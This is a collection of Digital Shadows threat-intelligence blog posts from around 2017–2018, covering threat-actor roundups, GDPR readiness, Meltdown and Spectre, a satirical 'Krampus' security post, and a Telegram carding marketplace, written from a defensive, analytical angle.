    Dan Lowden has more than 20 years of executive-level experience in technology marketing. He has successfully driven demand generation and brand leadership for large enterprises and startups in security, mobile computing, wireless services, enterprise software, and cloud. Previously Dan was Chief Marketing Officer at Invincea, a machine learning next-gen antivirus company that was recently acquired by Sophos. Prior to that, he was VP of Marketing at vArmour, a leading data center and cloud security company. Previous roles also include VP of Marketing at Digby (acquired by Phunware), and VP of Marketing and Business Development at Wayport (acquired by AT&T). In addition, he has held marketing leadership positions at IBM, NEC, and Sharp Electronics. Dan holds a Bachelor of Science in Finance from Rider University and an MBA in International Business from Rutgers Graduate School of Management.

    Shadow Talk Update – 01.29.2018 Mon, 29 Jan 2018 18:38:43 +0000 In this week’s Shadow Talk podcast episode, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.

    Dark Caracal Infiltrates Devices for Espionage

    The “Dark Caracal” threat group has conducted espionage through mobile and desktop malware variants since 2012, researchers have determined. The group delivered malware via phishing links and physical access to targeted devices, harvesting user information without particularly sophisticated tactics, techniques and procedures (TTPs). Although Dark Caracal has been allegedly linked to the Lebanese state, inconsistent geographic targeting, lack of tailored phishing content and operational security flaws do not suggest an organized, state-led campaign. Mobile devices will highly likely remain vulnerable to espionage and financially driven threats, given the valuable nature of their stored content.

    Dridex Campaign Debuts Distribution Tactic

    A new spam email campaign delivering the “Dridex” banking malware demonstrated a previously unreported tactic: compromising file transfer protocol (FTP) servers to act as the download location for malicious documents. The threat actors were likely trying to avoid detection by email gateways and network policies, which consider FTP servers as trusted locations. Security company Forcepoint attributed the campaign to the “Necurs” botnet, based on its previous association with Dridex, although this was a low-scale campaign in comparison with prior Necurs activity. More targeting of FTP servers to distribute malware is likely.

    Turla Updates Malware After NCSC Public Advisory

    The “Neuron” malware associated with “Turla”, a Russia-linked advanced persistent threat (APT) group, was updated five days after a public advisory on Turla activity by the United Kingdom National Cyber Security Centre (NCSC). Neuron was adapted to avoid identification by the malware detection signatures published by the NCSC. Although the reason for the update is unclear, Turla may have responded to public reporting on its own campaigns. Alternatively, Turla may have experienced diminished success following the advisory, when new defensive measures were taken. As threat actors can quickly change malware obfuscation techniques, organizations should be proactive about network security, using threat intelligence, network log monitoring and detection signatures.

    Misconfigured Jenkins Servers Exposed Companies’ Sensitive Data

    A researcher identified misconfigured servers associated with Jenkins, a software development tool. The accessed servers contained sensitive data pertaining to multiple British companies, including usernames, passwords, private keys and Amazon Work Space access tokens. The researcher identified exposed platforms using internet of things search engine Shodan, and then scraped revealed URLs to find unauthenticated login pages. It is unknown whether threat actors accessed any misconfigured servers; however, the method used to detect the vulnerable servers was likely replicable. Companies should ensure use of unique credentials and multi-factor authentication for internet-facing and cloud-based assets.

    Russian Fuel Customers Shortchanged in Criminal Operation

    A Russian criminal operation was disrupted after the perpetrators used software to over-charge individuals purchasing gas in Southern Russia. Malicious software was applied to electronic gas pumps and reportedly charged customers for more fuel than was delivered, shortchanging victims 3% to 7% per gallon of fuel pumped. The software enabled pumps, cash registers and back-end systems to display false data to victims and relied on complicit insiders at fuel stations. The developer of the software was reportedly arrested. The lucrative nature of the fuel industry means it will continue to be targeted by financially motivated criminal actors.

    Fancy Bears Leaks Documents from International Luge Federation

    The “Fancy Bears” hacking group publicly leaked documents purportedly sourced from the International Luge Federation (FIL), and claimed the violation of “principles of fair play”, particularly regarding drug tests. It is unknown how and when the documents were obtained, although threat group “APT-28” (aka Fancy Bear) allegedly targeted certain members of the International Olympic Winter Sports Federations in late 2017, including the FIL. The precise relationship between Fancy Bears and APT-28 is not publicly known, although APT-28 were previously associated with the compromise of the World Anti-Doping Agency in 2016. More leaks by Fancy Bears are likely in the near future.

    US Media Personalities Targeted in Twitter Phishing Campaign

    Media personalities and conservative individuals in the United States were targeted by a Twitter phishing campaign, potentially conducted by the Turkish Cyber Army. At least three Twitter accounts were confirmed as compromised, including that of journalists Sara Carter (@SaraCarterDC) and Greta Van Susteren (@greta), as well as Sheriff David Clarke (@SheriffClarkeTC). The campaign employed a spoofed Twitter login page, which was likely used to harvest credentials and compromise the three accounts. Although no official claim of responsibility was detected from the Turkish Cyber Army, this campaign would be consistent with previously observed activity. More media outlets will likely be targeted in the immediate future.

    Listen to this week’s Shadow Talk Episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.


    Data Privacy Day: 8 Key Recommendations for GDPR Readiness Fri, 26 Jan 2018 05:18:37 +0000 This Sunday is Data Privacy Day, “an international effort held annually on January 28th to create awareness about the importance of respecting privacy, safeguarding data and enabling trust”[1]. With GDPR regulations coming into effect May 2018, data privacy is even more top of mind for all organizations.

    If you have the responsibility for ensuring that your business meets the obligations under the GDPR, you are most likely either already down the path to compliance, or at least getting serious about plans to become compliant. Data exposure is becoming increasingly important as local, national, and international legal obligations bring about greater responsibilities for organizations to protect customer data in terms of compliance, notification, and monitoring.
    Data Privacy Day Info Image


    Here at Digital Shadows, we focus on providing our clients with comprehensive data loss monitoring and management across the widest range of intelligence sources found in the open, deep, and dark web. Through the combination of data science and machine learning, and more than 50 intelligence analysts, our service enables them to mitigate risk and demonstrate a long-term commitment to European and other regulators on this important issue.

    The GDPR regulations are an evolution of existing European Union (EU) privacy legislation ensuring that companies respect privacy, gain proper consents, and responsibly protect information and data under their control. While we recommend clients seek legal support, a great deal can be achieved by the following 8 activities:

    1. Scope Your Data – Make sure that you understand which data is in scope for your organization. This should include data about your customers and employees (as a Controller), as well as data your process on behalf of other organizations (as a Processor). GDPR encompasses protection of EU citizen data, regardless of where it resides. This also requires organizations identify any new sensitive data types, such as health information or information relating to children.
    2. Understand Data Transfer Agreements – Businesses need to clearly understand in which jurisdictions data is being held and accessed from and ensure that the transfers that take place are properly accounted for. This is especially important if some of that data is held outside of the EU as concurrence will be required.
    3. Update Consent Methods or Legal Basis for Processing – Update the methods via which consent is sought from individuals, or how the legal basis for lawful processing of that data is established. This should include assurances that the spirit of the data protection principles has been respected.
    4. Prepare for Subject Access Requests – Individuals can already request to see a copy of the information an organization holds about them. Under GDPR, businesses cannot charge EU consumers for access of data that may be held and must respond within one month of receiving the request. Consumers have additional rights such as ‘the right to be forgotten,’ and the right to modify and export records that must be properly addressed.
    5. Prepare for 72-Hour Notification – New rules exist for how quickly authorities must be notified in the event of a data breach. This new legislation requires data controllers to notify the national data protection regulator within 72 hours of a “breach.” This applies when the “data breach is likely to result in a high risk to the(ir) rights and freedoms.”
    6. Update Your Contracts with New Obligations – The legal contracts and policies must reflect suppliers’ obligations to their clients and the updated consent and requirements set out above.
    7. Update Your Privacy Policies and Statements – Ensure that the privacy policies and statements to consumers appropriately reflect obligations. The policies must be concise, transparent, intelligible, and free of charge. This includes the tailoring of language to different age groups; privacy information for children must be written appropriately.
    8. Designate a Data Protection Officer – Most organizations are legally required to nominate a Data Protection Officer (DPO) ). This applies to organizations that store a large amount of information about employees or other individuals. In particular, the rule applies to public authorities or those organizations that carry out large-scale monitoring of individuals.

    To learn more about becoming GDPR compliant, check out our recent paper, The Path to GDPR Compliance, where we provide recommendations  and the key resources that organizations can utilize to instill customer trust and brand protection.

    If you want to get involved in this year’s Data Privacy Day efforts, visit StaySafeOnline’s website for more information.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 



    Don’t Rely on One Star to Manage Digital Risk, The Key is Total Coverage Tue, 16 Jan 2018 16:12:58 +0000 This post originally appeared on

    Vince Lombardi, one of the greatest coaches of all time said, “The achievements of an organization are the results of the combined effort of each individual.” Think about the most successful coaches and you’ll see a common thread – the ability to bring players and staff together and use their talents effectively and intelligently to defeat opponents. Phil Jackson accomplished this with different NBA franchises and Joe Gibbs with different quarterbacks. They didn’t count on any one “star” to carry the team. Nor did they focus their efforts defending against one big threat. They led their teams to victory by looking at the big picture and understanding how to strategically apply capabilities to defeat whatever the opposition pulled out of their bag of tricks.

    Wouldn’t it make sense to follow a similar approach to defeat adversaries and mitigate digital risk, the risk associated with expanding our digital footprint as we increase business activities on the internet and via cloud solutions? But, typically, we don’t.

    Just as great coaches know they’re up against an entire team that can vary their plays and draw on different skills with the sole aim of defeating them, the risks as you digitally transform your business come from all kinds of adversaries and places beyond the boundary. Individually, you don’t just have a dark web problem, or an open source problem or a social media problem. You have a problem with ALL external digital risks and threat actors seeking to do your business harm. 

    Digital risks include cyber threats, data exposure, brand exposure, third-party risk, VIP exposure, physical threats and infrastructure exposure. Often these threats and risks span data sources and cannot be detected in full context by any point solution or even by multiple solutions used in isolation. You need insight across the widest range of data sources possible to mitigate digital risk and better protect your organization. Here are three examples.  

    1. We all know organizations struggle to keep up with patching, and this challenge isn’t expected to go away any time soon. Gartner predicts that through 2020, 99% of vulnerabilities exploited will continue to be the ones known by security and IT professionals for at least one year. Addressing every vulnerability as soon as a patch is issued isn’t possible for most IT teams. But determining which vulnerabilities to patch first can be problematic. By monitoring open, deep and dark web forums as well as social media you can learn which vulnerabilities are being discussed as popular vectors for attack. These sources can also reveal which exploit kits are using specific vulnerabilities and even if those exploit kits are being used to target your industry. Armed with this information, you can make more informed decisions about which systems and applications to patch first and more effectively and efficiently mitigate risk. 
    2. Ideologically motivated, hacktivists are far from quiet. They typically use social media to promote their cause and garner attention and often announce their targets on Facebook or Twitter. They also use Internet Relay Chat (IRC) to orchestrate attacks in real-time. Monitoring social media and open source IRC channels for an uptick in hashtags and traffic is a leading indicator of whether a cause is gaining traction. Mentions of your company, key executives or IP addresses will help you determine if you’re being targeted so you can proactively boost security controls.
    3. A more complex example, but one that has been in the spotlight recently, is database extortion. In this scenario, attackers look for publicly exposed databases, for example on Amazon S3 buckets. From there, they may be able to find information allowing them to remotely connect to a server or desktop to infiltrate your organization further. Or, as in the case of the MongoDB extortion pandemic, they can replace data with a ransom request for bitcoin payment in exchange for restoration of the database. Should the ransom request go unheeded, attackers may then apply pressure on the CEO by posting a message to Pastebin or via social media. In this scenario there are several points of compromise and several ways to gain a deeper understanding of the attack. To learn the entire sequence of events, the impact to your organization and how to mitigate digital risk in the future you need more than visibility into S3 buckets. You need access to hacked remote server and remote desktop protocol (RDP) sites to look for mentions of your IP addresses. Access to Pastebin and monitoring social media channels will allow you to check for mentions of your company and/or executives. The dark web can provide information on threat actor profiles to understand their motivation and gauge credibility.

    In each of these three examples, tracking just one source, or even all sources but in isolation would not give you the full context for any one of these threats. Like a coach, you need to be able to see the big picture with an approach that monitors the entire Internet for risks to your business. Only then can you take the right actions to keep your business and reputation intact and mitigate digital risk in the future.  

    Want to learn how we can help manage your organization’s digital risk? Watch our full demo video here.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Another Year Wiser: Key Dates to Look Out For In 2018 Wed, 10 Jan 2018 17:37:57 +0000 Early last year, we published a blog outlining the events of 2017 that were most likely to attract the attention of malicious actors who would present potential risks to your organizations. Unsurprisingly, many of the usual suspects were active at significant points in the year, such as tax deadline day, the German elections, and Black Friday.

    We are doing this again this year and want to make sure that you have these key events on your radar. When assessing the key events of 2018, we need to look at the activities of cybercriminals, hacktivists and nation-state affiliated actors.

    Date Event Actor Affected Geographies Targets
    6 February G20 summit Nation State; Hacktivism Argentina Government
    9 February Winter Olympics Nation State; Hacktivism; Cybercrime South Korea Event Sponsors, Consumers, Retailers; Hospitality
    13 February Tibetan Independence Day Nation State; Hacktivism Tibet; China; India Government
    4 March Italian Elections Nation State Italy Government
    18 March Russian Presidential Election 


    Nation State Russia Government
    17 April Tax Deadline Day Cybercriminal United States Consumers
    14 June FIFA World Cup Cybercriminal; Nation State; Hacktivism; Russia Event Sponsors, Consumers, Retailers; Hospitality
    14 August Pakistan Independence Day Nation State India; Pakistan Unknown
    9 September Swedish Elections Nation State Sweden Government
    18 September Anniversary of the Mukden Incident Hacktivism Japan Unknown
    November Irish Presidential Election Nation State Ireland Retail, Consumers
    5 November OpVendetta Hacktivism All Finance
    23 November Black Friday Cybercriminal United States Retail, Consumers
    26 November Cyber Monday Cybercriminal United States Retail, Consumers
    25 December Christmas Day Hacktivism All Online Gaming


    With an ever-increasing amount of money spent online, there are more opportunities for card not present fraud (fraud that can occur with transactions that are conducted online or over the phone). Just as we discovered in our “Retail Risks” whitepaper, these are risks that exist throughout the year. During Black Friday and Cyber Monday, criminal efforts tend to increase to take advantage of the increased number of transactions being made. Similarly, as we approach 17th April (that’s two days later than normal), we’re likely to see new techniques around tax return fraud emerge as criminals look to bypass IRS antifraud measures.

    There are other events that are likely to provide rich-pickings for cybercriminals. Two years ago, wrote about the risks to the Rio Olympics for retailers, sponsors, and consumers. Similarly, the Winter Olympics and the FIFA World Cup are expected to attract cybercriminals seeking to exploit card-wielding tourists.



    Despite the predictability of some reoccurring online protests, the significance of hacktivist campaigns is often difficult to anticipate. One example of such reoccurring campaigns is OpVendetta, which occurs each year on November 5. We monitor the levels of participation and organization to assess the likely impact of the campaign, as seen recently with the OpCatalunya operation that targets companies operating in Spain.

    Of course, hacktivist campaigns are not always as they appear; Anonymous Poland, for example, have previously demonstrated characteristics of a nation-state proxy. We will have to wait and see whether more hacktivist groups demonstrate techniques beyond the typical denial of service attacks and website defacements.


    Nation-State/Nation-State Affiliated

    Since the 2016 U.S. Presidential Election, election season has become a common time of the year for nation states and their affiliated groups to develop online campaigns. There are a range of tools and techniques widely available to actors who seek to influence elections. We’ll be keeping an eye on a host of elections coming up in 2018, but the key ones will be the Russian, Swedish, and Italian elections.


    While this is by no means a definitive list of 2018 hot spots, outlining these events at the beginning of the year provides us with areas of focus. With this focus, we can monitor for the key drivers and assess the likely impact of a particular campaign or event. To stay up to date with the latest key events, threat intelligence, and research, subscribe to our email list here.

    Why All Companies, CEO, CFO, CLO, and Board of Directors Should Require Digital Risk Management to Mitigate Corporate Risk Wed, 10 Jan 2018 16:16:27 +0000 Cyber attacks on businesses are now weekly news as breaches of data are announced regularly. However, until recently many corporate executives did not understand or share the view of its importance of addressing Digital Risk at the Board level. The Board’s role in understanding and monitoring digital and cyber risk has been highlighted by a multitude of lawsuits alleging Boards were asleep at the switch in the face of a known danger.

    Executives and Boards at all companies, especially public companies, face mounting pressure to consider what a worst-case cyber event would look like and how that event would be handled. What corporate governance structures would kick in? What will the legal fallout be —whether it is privacy litigation, shareholder suits or criminal investigations? To fully grasp the magnitude of such risk, Boards must address specific questions and implement effective policies that protect their customers, their organizations and themselves. In some states and countries, Board members may be personally liable for cybersecurity gaps and experts foresee that personal liability will only accelerate.

    Board of Director members are responsible for ensuring the corporation is managed in the shareholders’ best interest including:

    1. Fiduciary duties of Directors and Officers regarding Digital Risk and Cybersecurity. Most officers and directors understand you are acting on an informed basis, in good faith, and in the company’s best interests. Proper preparedness and risk management are critical to insulating officers and directors from liability. Boards must hold frequent meetings to analyze cyber risks and implement potential plans of actions. If appropriate, create a committee to review cyber issues and investigate data incidents and breaches. Boards must implement a risk management program, a monitoring plan, test the program to ensure compliance, and investigate possible violations.
    2. Officers and Directors should discharge their Digital Risk fiduciary duties. Digital Risk management programs must have the right technologies in place to identify where risks can have the most impact on the business and brand. Companies should have policies in place that detail the expected response to incidents and ensure that system controls are in place. A prepared team is needed, equipped with the tools and ability to take immediate action when problems arise and have the authority to monitor and test, both internally and externally, potential threats. Cyber incidents impact multiple levels of an organization and departments including legal, IT, risk/insurance, human resources, marketing, and public relations. These departments should be tasked with providing input in addition to that of board members and management. The companies best prepared to prevent and respond to cyber attacks recognize that this multifaceted preparedness is an ongoing cycle, and not simply a one-time list of tasks to complete.

    To demonstrate that a Board has properly discharged its duties, it must work with management to ensure proper teams have organized plans to prevent and respond to any breaches. Therefore, a company must constantly assess cyber risk trends and threats. Just because nothing appears to be happening on a daily, weekly, monthly or annual basis, does not mean an incident may not occur.

    The business judgment rule is a legal principle protecting officers, directors, managers and other agents of a corporation from liability for loss incurred as a result of business decisions that are within their authority and power to make when sufficient evidence demonstrates that the transactions were made in good faith. To ensure protection under the business judgment rule, it is wise to have regular presentations for pertinent committees to provide updates on trends and threats, and to ensure that your security IT practices are up to date.

    1. Investing in a Digital Risk framework. Companies struggle to determine how much to spend on IT security, an investment many liken to insurance — no one wants to pay more than they have to. If you are a public company, spend the money to protect the business. You no longer can afford to penny pinch. The liabilities, penalties and litigation impact are significant. Companies spend an average of 6-7% of their IT budget on security technology, outside services and staff. How much an organization invests in IT security stems from a range of criteria. Companies that are consumer facing, have a large attack surface, a recognized brand, highly guarded intellectual property, and compliance requirements to industry regulations and government legislation tend to outspend their peers. The reality is organizations of all types have experienced security breaches. There remains a misplaced belief in “security by obscurity” among organizations with lesser known brands, smaller attack surface, and less stringent industry regulations. The situation in the last 2-3 years has changed substantially. With so many global state actors and well-funded cybercrime organizations, IT security costs are increasing rapidly.

    The right answer does not start with a dollar figure, but companies should work through a Digital Risk management process. As a publicly listed company, you can no longer take an ad hoc approach, basing your budgeting decisions on trial and error, or reacting to problems as they arise instead of proactively approaching a security framework. This process is monitored and repeated (both internal networks and the external environment where your assets may have leaked through malicious actions or unintentionally lying in the open) and shortcomings addressed over time. This simple yet time-consuming process is undertaken by not only large public companies but also midmarket and small businesses who face the same cyber risks but typically with fewer IT security resources. With cybercrime advancing at unprecedented levels, companies must proactively implement a security risk management framework, develop technology internally, hire or outsource security professionals commensurate with your risk, train all employees on security awareness, and have a real-time incident response playbook that balances digital threat intelligence and risk mitigation.


    Want to learn more around GDPR and your team’s role in compliance and digital risk management? Download our latest report, “The Path to GDPR Compliance”.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Digital Shadows Launches Weekly Newsletter: “In the Shadows” Mon, 08 Jan 2018 10:30:07 +0000 Digital Shadows has just launched a new research-led weekly newsletter, “In the Shadows”, and podcast, “Shadow Talk”. Both highlight key findings of primary-source research our Intelligence Team is conducting, along with the latest threat actors, campaigns, security events and industry news. From technical exploit analysis to strategic insights, the content of the newsletter and podcast allows a timely and concise “analyst’s eye view” of key information security issues.

    In upcoming weeks, expect to be updated on our ongoing research into the cybercriminal underground, as well as the effect that increasing exposure and scrutiny from law enforcement has had on this community over the past few years. The latest findings can be found each week in the newsletter, here:

    The cybercriminal community has been significantly disrupted by the high-profile take-down of dark web criminal marketplaces, such as the Silk Road, HANSA and AlphaBay. Rather than overtly deterring cybercriminal activity, the prominent media coverage has, in fact, increased the number of users logging onto cybercriminal forums. What has changed significantly from the “back in the day” forums to the new generation is the trust models users are creating to ensure security.

    The Intelligence Team looks forward to sharing this research via “In the Shadows.” Stay up to date with the latest security news and trends by signing up to receive “In the Shadows”, in your inbox, every Monday:

    You can also listen to the latest research subjects discussed on “Shadow Talk”, which will feature the Digital Shadows Research and Intelligence Teams covering a hot topic in security each week.

    Hear our very first Shadow Talk podcast episode here:

    Don’t miss an episode—sign up now for updates:

    GDPR: Why You Need to Consider the Personal Data That Lies Outside of Your Organization Thu, 04 Jan 2018 21:48:41 +0000 In 2010, reports emerged that the Information Commissioners’ Office (ICO) could now fine organizations up to £500,000 ($677,000) under the Data Protection Act. Eight years later and that cap has proven woefully insufficient in acting as a deterrent to organizations’ lax attitude towards data protection. In May 2018, organizations could be fined up to four percent of their revenue or €20 million ($24 million) – whichever is greater.

    While the potential fines under GDPR have attracted the headlines, our new report, GDPR: A Path to Compliance, distills some of the key changes coming and provides a framework with practical advice of how to minimize compliance challenges when the legislation (and fines) comes into force in May 2018. GDPR isn’t new, it’s been in the works since at least January 2012 when the European Commission proposed an update to data protection regulation. As the number of breaches continues to increase (albeit not necessarily publicly reported), this issue has only become more important.

    The “D” in GDPR is focused on data, and so Information Technology plays a critical role. While there must be an effort to understand what sensitive data sits within the organization, organizations must also look beyond the perimeter to understand how and where EU citizen personal data is exposed.


    First of all, organizations need to consider what is meant by “personal data” – this definition has broadened significantly under the EU Data Protection Directive:

    “‘Personal data’ shall mean any information relating to an identified or identifiable natural person (‘Data Subject’); an identifiable person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity.”

    In reality, this means that personal data extends to far more than before – even IP addresses and browser cookies are considered to be personal data. Organizations need to be aware of what personal data they hold, either as a Controller (data about your own customers and employees) or Processor (data that you process on behalf of other organizations).

    Given this broad definition, how can organizations go about becoming GDPR compliant? Our paper sets out four key stages GDPR compliance: discover, define, deliver, and detect. Within each of these stages, we provide advice and the key resources that organizations can turn to.

    GDPR compliance cannot be achieved easily with a shiny new widget or product. Instead, a well-thought-out program that addresses data loss management will help organizations demonstrate a high level of compliance to a regulator and minimize the commercial and reputational risks associated with a regulatory failure.

    With the scope of personal data expanded, organizations cannot simply protect their data at the boundary. Download our report to find out how to manage your data exposure in line with GDPR.

    Meltdown and Spectre: The Story So Far Thu, 04 Jan 2018 18:27:12 +0000 On Wednesday, rumors surfaced that there were vulnerabilities in the majority of microprocessors, which would allow attackers to access system memory information held in the kernel, the most privileged area of modern operating systems. The kernel manages processes including starting and ending user programs, security settings, memory handling, and controlling hardware such as memory and network drives.

    Later in the day the security community rallied together to produce a barrage of research on two different attacks that took advantage of these flaws: enter Meltdown and Spectre.

    With so much overlapping commentary, and further details likely to be released, it’s hard to make sense of exactly what’s going on and what systems are at risk. Here’s what we know – and do not yet know – so far. The Digital Shadows Intelligence team conducted this analysis by:

    1. Reproducing and validating the Spectre Proof of Concept Code (POC) found in the Spectre academic whitepaper,
    2. Researching criminal forums for related activity,
    3. Collating publicly available research from the security community.

    What we know about Meltdown and Spectre

    • Meltdown and Spectre were discovered by at least three different groups, including researchers at Google Project Zero, Cyberus Technology and Graz University of Technology. The flaws were responsibly disclosed back in June 2017, but details of the vulnerabilities only appeared yesterday on January 3rd. It seems the affected companies wanted to keep the news under wraps until fixes were ready to be released, but the vulnerabilities were disclosed earlier than planned.
    • Meltdown is an attack that bypasses the mechanism between the operating system and applications. This can lead to the exposure of passwords and other sensitive data stored in the system memory. The vulnerability can be tracked via CVE-2017-5754.
    • Spectre is an attack that bypasses the isolation between applications by exploiting what is known as a “speculative execution”, used by modern processors to increase performance speed. Under the right conditions, the processor can be tricked into leaking data returned from other applications, exposing sensitive data. The exploit is tracked via CVE-2017-5753 and CVE-2017-5715.Digital Shadows analysts tested a proof-of-concept code referenced in the Spectre whitepaper, which functioned correctly.


    Spectre proof of concept exploit tested on an Ubuntu 16.04 VM by Digital Shadows

    • These flaws are not exclusive to Intel processors, they also affect AMD and ARM. Cloud environments are also at risk as an attacker could break out of one user’s process and access processes running on the same shared server.
    • Patches for Meltdown have been released; however, there is currently no specific patch available for Spectre, which will likely require a hardware fix to mitigate completely. The US CERT certainly seems to think so.

    What we don’t know about Meltdown and Spectre

    • Although the general consensus is that nearly every processor commonly in use today is at risk, the full extent of which systems and platforms are affected is still unknown.
    • How easy is it to exploit these flaws? There have not been any reports of Meltdown or Spectre attacks being performed in the wild for malicious purposes. While Digital Shadows’ analysis of the Spectre POC code functioned correctly, the intricacies and feasibility of performing a Spectre attack against another machine under the right conditions with the “speculative exploitation” approach is still unclear.
    • How can threat actors leverage Meltdown and Spectre for their attacks? The exploit scenarios are some of the biggest unknowns. The nature of the vulnerabilities themselves lead to the exposure of sensitive data such as encryption keys and passwords, so future attacks would likely involve users stealing this information to then takeover machines and accounts. Internet of Things (IoT) devices are also susceptible as they run the same type of processors, and people are less likely to update these accordingly the same way they would their personal or work computers. A dedicated attacker could decide to use these vulnerabilities to find flaws and default passwords in IoT devices, which we saw led to the creation of the Mirai botnet.
    • Criminals do not need to use Meltdown and Spectre for their attacks if they can profit in other ways. We have seen actors discussing the sale of the exploits on the Shadow Broker’s “Scylla Hacking Store” for $8900. This is likely to be the first of many claimed sales across the dark web and criminal forums, as cybercriminals look to profit from the media attention and hysteria around these discoveries.

    Meltdown and Spectre exploit advertised for sale by the Shadow Brokers 


    What you can do about it

    A host of companies have come out and released advisories for their affected products. We have provided a list of these and their relevant websites below:

    1. Intel
    2. Microsoft
    3. Google
    4. Amazon
    5. ARM
    6. Android
    7. Mozilla
    8. Linux
    9. Red Hat
    10. Apple

    Patching and rebooting should therefore be a priority requirement for all organizations and home users. Despite this, there are a few things to bear in mind:

    • Spectre cannot yet be completely mitigated against through patching,
    • These mitigations will affect system performance and slow down machines. You will want to test out the mitigations prior to deploying them.
    • Mitigating and patching hardware with software is very difficult, and it creates problems with other applications (e.g.: endpoint protection)

    These patches are only preliminary measures though, and there will probably be future updates released to combat the performance problems caused by these fixes.

    What we can be certain of is that this issue will run on for a considerable length of time. Digital Shadows will continue to post updates on both Meltdown and Spectre as and when new information becomes available. Happy New Year!

    What Attackers Want for Christmas Fri, 22 Dec 2017 16:41:56 +0000 Our guest author Krampus has a special blog post for the Team with the festive Red colours:

    Christmas lists are always a problem, here are some examples to get attackers thinking during the holiday season:

    • Leaked (NSA) exploits: ETERNALBLUE, ETERNALROMANCE and friends have been a rare delight this year, bringing a smile to the lips of ol’Krampus. The destruction wreaked by WannaCry, NotPetya and BadRabbit has spoken to the power of these leaked exploits. There’s nothing that Krampus likes better than gaining SYSTEM privileges directly over the network!
    • Vulnerable Supply Chain: Big or small, secondary or tertiary, supply chains have been this year’s go-to attack vector. Krampus likes to go for the weakest link in the supply chain and pivot up from there into the target, exploiting highly-connected vendors, subsidiaries and suppliers to reach the goal.
    • Poorly trained workforce: The human element is what gets naughty children on Krampus’ list and Krampus loves the organizations that help to get them there! Not training the workforce to pick on social engineering attacks and terrifying them of the consequences of making a mistake is a fantastic way to help attackers get what they want for Christmas.
    • Credential hygiene: While exploits are effective, other methods of gaining access shouldn’t be ignored. Poor credential hygiene has been exploited by worms like NotPetya with tremendous effect. By taking advantage of password reuse, especially for accounts with Administrator privileges, attackers have been able to compromise environments at scale in a matter of minutes. An all-time Krampus favourite!
    • Data breaches: Nothing warms Krampus’ blackened heart than the theft of hundreds of millions of sensitive records. Data breaches provide such wonderful opportunities for theft, fraud, account takeover, credential reuse and extortion! They happen with a pleasing regularity and Krampus can only say: “bring ‘em on!”.
    • False positives: An organization may have a SOC, but luckily for ol’Krampus, they are typically flooded with false positives, which allows Krampus and friends to rampage unimpeded through their preferred targets. Misconfigured logging systems create a noisy environment where the defenders can’t see the danger until Krampus is long gone! A trusted and loyal friend over the years!
    • Target-rich environments: Once inside a particular environment, it’s always preferable for there to be a lack of segmentation so that exploits and credential reuse can be used to find vulnerable systems. In particular, sensitive data should be available in as many different places as possible and accessible by as many users as possible. This way Krampus doesn’t have to be that specific in his targeting; the naughty list can be as long as you like!

    In order to keep Krampus and his hoards out of your network, we recommend robust security engineering principles to defend your networks:

    1. Default deny: that is, “only provide access where it has been explicitly granted, otherwise deny”.
    2. Least Privilege: that is, “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job”.
    3. (Attack) Surface Reduction: that is, reduce the amount of services running, the number of privileged users and the number of entry points into the system.
    4. Need to Know/Compartmentalization: that is, only grant access where there is an explicit business requirement to do so.
    5. Defence in Depth: that is, not one single control is sufficient to adequately protect a system. Careful usage of the other four principles in physical, technical and administrative controls will go a long way to keeping Krampus out!

    You can find out more about these principles in a previous post we have written on the importance of security engineering.

    OL1MP: A Telegram Bot Making Carding Made Easy This Holiday Season Thu, 21 Dec 2017 16:12:04 +0000 Back in July, we published our research on the carding ecosystem, specifically on an online course that teaches carders how to successfully commit fraud. “Carding” refers to the process of using stolen credit cards to purchase goods or services, which can then be sold on at a reduced price in order to clean the money. Since the demise of AlphaBay and Hansa marketplaces, fraudsters have looked for new platforms to sell these carded goods and services.


    Figure 1: The OLYMP/OL1MP Telegram Marketplace

    Digital Shadows’ intelligence analysts have identified a Telegram Market gaining traction called “OL1MP”. OL1MP has been active since August 2017 looks to provide a new format for buying and selling these goods and services. This is all made easy by the creation of a bot to automate the browsing of these shops. There is a range of items for sale on OL1MP, including discounted hotels, drugs, taxis, documents and driving licenses. OL1MP has a wide range of items for sale including: discounted hotels, drugs, taxis, driver’s licenses and documents. For example, the latter offering includes counterfeit press passes for events.

    On the back of the recent surge in Bitcoin, the market also offers exchange. But it’s not the first Telegram channel to get involved in the trade of cryptocurrencies. Last month, we released research on the “Pump and Dump” schemes that seek to manipulate the price of currencies like UBQ, VCash, Chill Coin, Magi Coin, and Indorse.

    Telegram has been increasing in popularity among cybercriminals, who favor the privacy offered by its encryption. The platform is also very user friendly, and the OL1MP market is no exception. The following figures demonstrate the flow a buyer takes in choosing a service on the OL1MP market, in this case for discounted travel.

    Figure 2: Starting the OL1MP bot, with options “About the project, Escrow, Dope Shops, Services, Holidays, Taxi”


    Figure 3: With “Holidays” selected, the user is able to choose from three verified providers of travel


    Figure 4: Selecting one option, Rick Travel, takes the user to the specific group for that seller. In this case, users can book hotels for 30% of their value and flights for 50%.


    OL1MP ties in this automated effort with a human touch. As with most marketplaces, reviews are important for attracting new customers. In fact, extra discounts are available for those individuals who post pictures and positives comments from their carded holidays.

    In some instances, hotel booking agencies (among other victims) may detect this suspicious activity and cancel the reservation. So, while the functionality of this automated bot is an interesting innovation, there is still a need for human support. In addition to the creator of the OL1MP bot, the telegram group has who offer support on a separate channel.

    Figure 5: The profile of OL1MP’s creator


    Carding is not new, but fraudsters continually look for new ways to sell and buy carder items. The shift to Telegram is part of a broader trend, as criminals looks to find secure but effective ways to promote their goods and services. You can learn about what payment card companies, merchants and consumers can do to protect themselves from carding.

    ‘Tis The Season To Do Predictions – The 2018 Cybersecurity Landscape Mon, 18 Dec 2017 18:09:23 +0000 This post originally appeared on Huffington Post.

    Every year around this time all the security businesses and analysts leap for their crystal ball and attempt to predict what we should be worrying about in the coming 12 months or more. And the sad reality is that not a lot will change as there is not much need for the cybercriminal community to do anything different – it’s already working well now!

    The cybercriminal community is all about profit and that means they continue to utilise the same sorts of tactics if they continue to gain the results they are after – mainly money!

    That said though, how will the threat landscape look like over the next 12 months?

